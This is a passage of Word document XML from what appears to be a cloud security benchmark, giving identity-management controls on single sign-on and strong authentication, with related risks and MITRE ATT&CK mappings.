    <w:p w14:paraId="1858F090" w14:textId="426ADEE1" w:rsidR="00006B84" w:rsidRPr="00E53977" w:rsidRDefault="00006B84" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Enable identity protection policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A275DB" w14:textId="02851BA9" w:rsidR="0079540C" w:rsidRPr="00E53977" w:rsidRDefault="00006B84" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Enable user and sign-in risk policies via Microsoft Entra ID Protection and block legacy authentication protocols to prevent insecure access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EABC7CF" w14:textId="1F920334" w:rsidR="00006B84" w:rsidRPr="00E53977" w:rsidRDefault="00006B84" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Enforce multifactor authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2A682C" w14:textId="1B4F779D" w:rsidR="00006B84" w:rsidRPr="00E53977" w:rsidRDefault="00006B84" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Require MFA for all users supporting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>passwordless</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> methods (e.g., FIDO2, Windows Hello) and mandate MFA for administrative roles to secure privileged access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279534F1" w14:textId="17ED0D86" w:rsidR="00006B84" w:rsidRPr="00E53977" w:rsidRDefault="00006B84" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Enable self-service capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478182FB" w14:textId="76A72D6A" w:rsidR="00006B84" w:rsidRPr="00E53977" w:rsidRDefault="00006B84" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="10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rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Control application consent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EB9B29" w14:textId="5DDB1F76" w:rsidR="00237470" w:rsidRPr="00E53977" w:rsidRDefault="00237470" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Restrict users from granting consent to unmanaged applications to prevent unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27041C50" w14:textId="092892BB" w:rsidR="00237470" w:rsidRPr="00E53977" w:rsidRDefault="00237470" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Deploy identity threat detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0F0B20" w14:textId="37BEBF79" w:rsidR="00237470" w:rsidRPr="00E53977" w:rsidRDefault="00237470" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="10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9" w:name="_Toc242449482"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>IM-5: Use single sign-on (SSO) for application access</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="6D93F9ED" w14:textId="40155340" w:rsidR="00237470" w:rsidRDefault="00237470" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B49654" w14:textId="329C53E1" w:rsidR="0005196D" w:rsidRPr="00E53977" w:rsidRDefault="0005196D" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0005196D">
        <w:t xml:space="preserve">Implement single sign-on (SSO) to streamline user authentication across cloud services, SaaS applications, and on-premises environments, enhancing user experience and security. SSO allows users to log in once via a trusted identity </w:t>
      </w:r>
      <w:r w:rsidRPr="0005196D">
        <w:lastRenderedPageBreak/>
        <w:t>provider and access all authorized resources without repeated logins. This reduces password fatigue, minimizes credential sprawl, and mitigates risks like phishing, brute-force attacks, and exposed credentials by enforcing centralized MFA, consistent TLS, and unified monitoring, ensuring secure and efficient access management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DA94DC" w14:textId="77CA19FE" w:rsidR="00237470" w:rsidRPr="00E53977" w:rsidRDefault="00237470" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="798D924E" w14:textId="27FA5B49" w:rsidR="00237470" w:rsidRDefault="00237470" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Exposure of Application-Specific Credentials in Code or Configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AFB80E" w14:textId="63031274" w:rsidR="0005196D" w:rsidRPr="00E53977" w:rsidRDefault="0005196D" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="0005196D">
        <w:t>Plaintext credentials (e.g., API keys, passwords) embedded in source code or configuration files (e.g.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0005196D">
        <w:t>, .env</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0005196D">
        <w:t>, JSON) are exposed via misconfigured repositories or CI/CD pipelines, enabling adversaries to authenticate to cloud or on-premises services via API endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5F7368" w14:textId="1787967C" w:rsidR="00237470" w:rsidRPr="00E53977" w:rsidRDefault="00237470" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Credential Theft via Phishing Across Multiple Login Interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E2F27F" w14:textId="6FAC1902" w:rsidR="00237470" w:rsidRPr="00E53977" w:rsidRDefault="00237470" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Adversaries capture credentials through spear-phishing (e.g., fake app-specific login pages) or intercept unencrypted traffic to varied login endpoints, exploiting inconsistent TLS configurations to acquire credentials for multiple systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0658BF17" w14:textId="19EE4AEC" w:rsidR="007C5D5C" w:rsidRPr="00E53977" w:rsidRDefault="007C5D5C" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Unauthorized Access from Weak or Reused Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CB5FEE" w14:textId="6AAAC8EB" w:rsidR="007C5D5C" w:rsidRPr="00E53977" w:rsidRDefault="007C5D5C" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">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rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Persistent Access via Untracked Application Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EE714B" w14:textId="5D42A9A6" w:rsidR="007C5D5C" w:rsidRPr="00E53977" w:rsidRDefault="007C5D5C" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="144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rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Detection Evasion via Unmonitored Credential Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674915FA" w14:textId="44E104E9" w:rsidR="007C5D5C" w:rsidRPr="00E53977" w:rsidRDefault="007C5D5C" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="144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rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E330F7B" w14:textId="2CF985BC" w:rsidR="001040D9" w:rsidRDefault="001040D9" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Credential Access (TA0006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045D0366" w14:textId="44C95E79" w:rsidR="0005196D" w:rsidRDefault="0005196D" w:rsidP="007E1A24">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="364"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="0005196D">
        <w:t xml:space="preserve">Phishing: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0005196D">
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0005196D">
        <w:t xml:space="preserve"> Link (T1566.001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE7B648" w14:textId="0748B5DC" w:rsidR="0005196D" w:rsidRPr="00E53977" w:rsidRDefault="0005196D" w:rsidP="007E1A24">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="364"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="0005196D">
        <w:t>Unsecured Credentials: Credentials in Files (T1552.001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AC3641" w14:textId="0A2F6ADC" w:rsidR="001040D9" w:rsidRDefault="001040D9" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D1E2CA" w14:textId="19E69121" w:rsidR="0005196D" w:rsidRPr="00E53977" w:rsidRDefault="0005196D" w:rsidP="007E1A24">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="364"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="0005196D">
        <w:t>Valid Accounts (T1078): Stolen credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAE6C42" w14:textId="536557BF" w:rsidR="001040D9" w:rsidRDefault="001040D9" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Persistence (TA0003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C845C22" w14:textId="3D5A5AC8" w:rsidR="0005196D" w:rsidRPr="00E53977" w:rsidRDefault="0005196D" w:rsidP="007E1A24">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="364"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="0005196D">
        <w:t>Account Manipulation (T1098)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FBC778" w14:textId="3272F27B" w:rsidR="001040D9" w:rsidRDefault="001040D9" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1389966F" w14:textId="7CBD6C2B" w:rsidR="0005196D" w:rsidRPr="00E53977" w:rsidRDefault="0005196D" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="364"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="0005196D">
        <w:lastRenderedPageBreak/>
        <w:t>Masquerading (T1036): Stolen credentials mimic legitimate API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD30A60" w14:textId="5C726B40" w:rsidR="001040D9" w:rsidRPr="00E53977" w:rsidRDefault="001040D9" w:rsidP="001040D9">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>IM-5.1: Use single sign-on (SSO) for application access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17942419" w14:textId="767FC242" w:rsidR="001040D9" w:rsidRPr="00E53977" w:rsidRDefault="001040D9" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Implement SSO across your environment using the following approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649ACBF1" w14:textId="1A1611C7" w:rsidR="001040D9" w:rsidRPr="00E53977" w:rsidRDefault="001040D9" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Plan SSO implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B2E80A" w14:textId="09AB6143" w:rsidR="001040D9" w:rsidRPr="00E53977" w:rsidRDefault="001040D9" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Identify applications (cloud, on-premises, customer-facing) and Azure resources requiring SSO. Categorize users as enterprise (employees), external </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>trusted</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> (partners), or public (customers). Decide protocols (e.g., OpenID Connect, SAML 2.0, OAuth 2.0) based on app compatibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E85D19E" w14:textId="424D1FE4" w:rsidR="00E05FF3" w:rsidRPr="00E53977" w:rsidRDefault="00E05FF3" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Configure SSO in Microsoft Entra ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF341E7" w14:textId="56CC9B28" w:rsidR="00E05FF3" w:rsidRPr="00E53977" w:rsidRDefault="00E05FF3" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Leverage Microsoft Entra ID to streamline access to customer-facing workload applications through single sign-on (SSO), eliminating the need for duplicate user accounts. Register applications in the Entra App Registration module and configure SSO settings using SAML metadata or OIDC client IDs/secrets as needed. Assign Azure RBAC roles (e.g., Contributor) for management plane access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164C225E" w14:textId="35DA1C18" w:rsidR="00E05FF3" w:rsidRPr="00E53977" w:rsidRDefault="00E05FF3" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Enable SSO for enterprise users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125B77FD" w14:textId="6C11E26F" w:rsidR="00E05FF3" w:rsidRPr="00E53977" w:rsidRDefault="00E05FF3" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Sync on-premises Active Directory with Entra ID using Entra Connect enabling seamless SSO with corporate credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D606D5" w14:textId="4890A3E5" w:rsidR="00E05FF3" w:rsidRPr="00E53977" w:rsidRDefault="00E05FF3" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Configure SSO for external partners</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7739D57C" w14:textId="52E4577E" w:rsidR="00E05FF3" w:rsidRPr="00E53977" w:rsidRDefault="00E05FF3" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Implement SSO for public users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A569FCC" w14:textId="19DCF42B" w:rsidR="00D960A3" w:rsidRPr="00E53977" w:rsidRDefault="00D960A3" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Use Entra ID B2C for customer-facing apps, setting up user flows for SSO with user's external identities (e.g., social network identities).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C979C3" w14:textId="68949661" w:rsidR="00D960A3" w:rsidRPr="00E53977" w:rsidRDefault="00D960A3" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Secure access with Conditional Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E24C2B8" w14:textId="3B13CAC6" w:rsidR="00D960A3" w:rsidRPr="00E53977" w:rsidRDefault="00D960A3" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:ind w:left="108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20" w:name="_Toc242449483"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>IM-6: Use strong authentication controls</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="4181B8F3" w14:textId="5263028A" w:rsidR="00C41D47" w:rsidRPr="00E53977" w:rsidRDefault="00C41D47" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553D9779" w14:textId="77777777" w:rsidR="001F7CBB" w:rsidRPr="001F7CBB" w:rsidRDefault="00C41D47" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Enforce strong and phishing-resistant authentication controls (strong </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>passwordless</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> authentication or multi-factor authentication) with your centralized identity and authentication management system for all access to resources.</w:t>
      </w:r>
      <w:r w:rsidR="001F7CBB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F7CBB" w:rsidRPr="001F7CBB">
        <w:t> Authentication based on password credentials alone is considered legacy, as it is insecure and does not stand up to popular attack methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E8ED80" w14:textId="77777777" w:rsidR="001F7CBB" w:rsidRPr="001F7CBB" w:rsidRDefault="001F7CBB" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="001F7CBB">
        <w:lastRenderedPageBreak/>
        <w:t>When deploying strong authentication, configure administrators and privileged users first, to ensure the highest level of the strong authentication method, quickly followed by rolling out the appropriate strong authentication policy to all users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FFFDD8" w14:textId="76BB8696" w:rsidR="00C41D47" w:rsidRPr="00E53977" w:rsidRDefault="00C41D47" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="61C3D5A7" w14:textId="60FF44B7" w:rsidR="00C41D47" w:rsidRPr="00E53977" w:rsidRDefault="00C41D47" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Credential Compromise via Phishing or Interception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E20E771" w14:textId="2274FFFE" w:rsidR="00C41D47" w:rsidRPr="00E53977" w:rsidRDefault="00C41D47" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="144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rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Weak or Reused Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7886A7EA" w14:textId="6B863FF1" w:rsidR="00C41D47" w:rsidRPr="00E53977" w:rsidRDefault="00C41D47" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Predictable or reused passwords enable brute-force attacks or credential stuffing from breached databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8D9CA4" w14:textId="41219639" w:rsidR="00C41D47" w:rsidRPr="00E53977" w:rsidRDefault="00C41D47" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
